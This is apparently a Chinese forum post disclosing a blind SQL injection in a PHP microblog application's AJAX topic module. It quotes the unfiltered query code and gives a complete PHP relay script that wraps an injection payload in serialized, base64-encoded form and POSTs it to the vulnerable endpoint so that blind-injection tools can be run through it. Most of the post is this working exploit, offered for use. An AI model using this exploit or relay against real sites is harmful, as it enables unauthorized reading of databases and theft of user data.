|
|
/modules/ajax/topic.mod.php
function Pic_ajax()
{//echo 11; //echo base64_encode(serialize(array('a'=>'0\'#'))); $options = array(); $TopicListLogic = Load::logic('topic_list', 1); $per_page_num = $this->Post['pp_num'] ? (int)$this->Post['pp_num'] : 20; $cache_time = $this->Post['c_time'] ? (int)$this->Post['c_time'] : 10; $uid = $this->Post['uid'] ? $this->Post['uid'] : ''; if($this->Code =='channel'){ $id = $this->Post['id'] ? $this->Post['id'] : ''; //获取 $options = array( 'item'=>'channel', 'item_id' => unserialize(base64_decode($id)),//解码,应为Base64所以无视Gpc。。 'perpage' => $per_page_num, ); $info = $TopicListLogic->get_data($options);//查询函数 里面也没做任何过滤 get_data($param, $caller = "web")..... $item_ids = $this->_process_param($param['item_id']);//这里 赋值 $item = trim($param['item']);.....$where_sql = ($perm_sql ? " AND {$perm_sql} " : ''). (isset($param['tid']) ? ' AND `tid` IN ('.jimplode($tids).') ' : ''). ($roottids ? ' AND roottid IN ('.jimplode($roottids).') ' : ''). ($from ? " AND `from`='{$from}' " : ''). ($item_ids ? " AND `item_id` IN (".jimplode($item_ids).") " : '').//写入语句 ($item ? " AND `item`='{$item}' " : ''). ($content ? " AND `content`='{$content}' " : ''). ($content2 ? " AND `content2`='{$content2}' " : ''). ($filter_sql ? ' and '.$filter_sql : '');
test
可能注入起来比较麻烦
应为没有回显 只能盲注,
所以我写了个中转程序 丢工具跑
<?php$data=base64_encode(serialize(array('a'=>'0\') and 1='.$_GET[id].'#'))); $flag = 0; $post = ''; $errno = ''; $errstr = ''; $host='127.0.0.1'; $path='/jsg';$argv = array( 'id'=>$data,);foreach ($argv as $key=>$value) { if ($flag!=0) { $post .= "&"; $flag = 1; } $post.= $key."="; $post.= urlencode($value); $flag = 1; } $length = strlen($post); //创建socket连接 $fp = fsockopen("$host",80,$errno,$errstr,10) or exit($errstr."--->".$errno); //构造post请求的头 $header = "POST {$path}/ajax.php?mod=topic&code=channel HTTP/1.1\r\n"; $header .= "Host: {$host}\r\n"; $header .= "Referer: /flandy/post.php\r\n"; $header .= "Content-Type: application/x-www-form-urlencoded\r\n"; $header .= "Content-Length: ".$length."\r\n"; $header .= "Connection: Close\r\n\r\n"; //添加post的字符串 $header .= $post."\r\n"; //发送post的数据 fputs($fp,$header); $inheader = 1; while (!feof($fp)) { $line = fgets($fp,1024); //去除请求包的头只显示页面的返回数据 if ($inheader && ($line == "\n" || $line == "\r\n")) { $inheader = 0; } if ($inheader == 0) { echo $line; } }fclose($fp);?>
跑起来的速度还凑合
 |
|
窥视卡
雷达卡
发表于 2012-11-8 03:57:50
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
抢沙发
千斤顶
显身卡
发表于 2012-11-9 21:59:18